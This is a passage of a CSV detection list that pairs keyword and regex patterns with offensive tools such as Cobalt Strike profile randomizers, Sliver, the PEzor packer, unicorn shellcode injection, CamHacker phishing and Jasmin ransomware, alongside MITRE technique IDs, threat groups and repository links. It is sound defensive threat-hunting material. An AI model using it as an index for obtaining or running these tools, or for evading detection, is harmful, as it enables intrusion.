randomize Cobalt Strike Malleable C2 profiles and reduce the chances of 
flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.secure.123456.*",".{0,1000}\.secure\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.sh *--checksec*",".{0,1000}\.sh\s.{0,1000}\-\-checksec.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*.sh *cvelist-file:*",".{0,1000}\.sh\s.{0,1000}cvelist\-file\:.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*.sh -format=bof *.exe*",".{0,1000}\.sh\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -format=service-dll *",".{0,1000}\.sh\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -format=service-exe *",".{0,1000}\.sh\s\-format\=service\-exe\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -xorkey=*",".{0,1000}\.sh\s\-xorkey\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sharpgen *",".{0,1000}\.sharpgen\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*.ShellcodeRDI*",".{0,1000}\.ShellcodeRDI.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*.sites.123456.*",".{0,1000}\.sites\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.SliverRPC/*",".{0,1000}\.SliverRPC\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*.smtp.123456.*",".{0,1000}\.smtp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ssl.123456.*",".{0,1000}\.ssl\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "*.static.123456.*",".{0,1000}\.static\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.status.123456.*",".{0,1000}\.status\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize 
Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.store.123456.*",".{0,1000}\.store\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.striker.local*",".{0,1000}\.striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*.support.123456.*",".{0,1000}\.support\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.tor2web *",".{0,1000}\.tor2web\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*.torproject.org/*/download/tor/*",".{0,1000}\.torproject\.org\/.{0,1000}\/download\/tor\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.tunneler/cf.log*",".{0,1000}\.tunneler\/cf\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/cloudflared*",".{0,1000}\.tunneler\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/loclx*",".{0,1000}\.tunneler\/loclx.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/loclx.log*",".{0,1000}\.tunneler\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.txt shellcode hta*",".{0,1000}\.txt\sshellcode\shta.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt shellcode macro*",".{0,1000}\.txt\sshellcode\smacro.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt shellcode 
ms*",".{0,1000}\.txt\sshellcode\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt.bat*",".{0,1000}\.txt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.dll*",".{0,1000}\.txt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.exe*",".{0,1000}\.txt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.htm*",".{0,1000}\.txt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.iso*",".{0,1000}\.txt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.jar*",".{0,1000}\.txt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*.txt.jasmin*",".{0,1000}\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.txt.js",".{0,1000}\.txt\.js","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.sfx*",".{0,1000}\.txt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.vbs*",".{0,1000}\.txt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.unconstrained.txt*",".{0,1000}\.unconstrained\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.videos.123456.*",".{0,1000}\.videos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
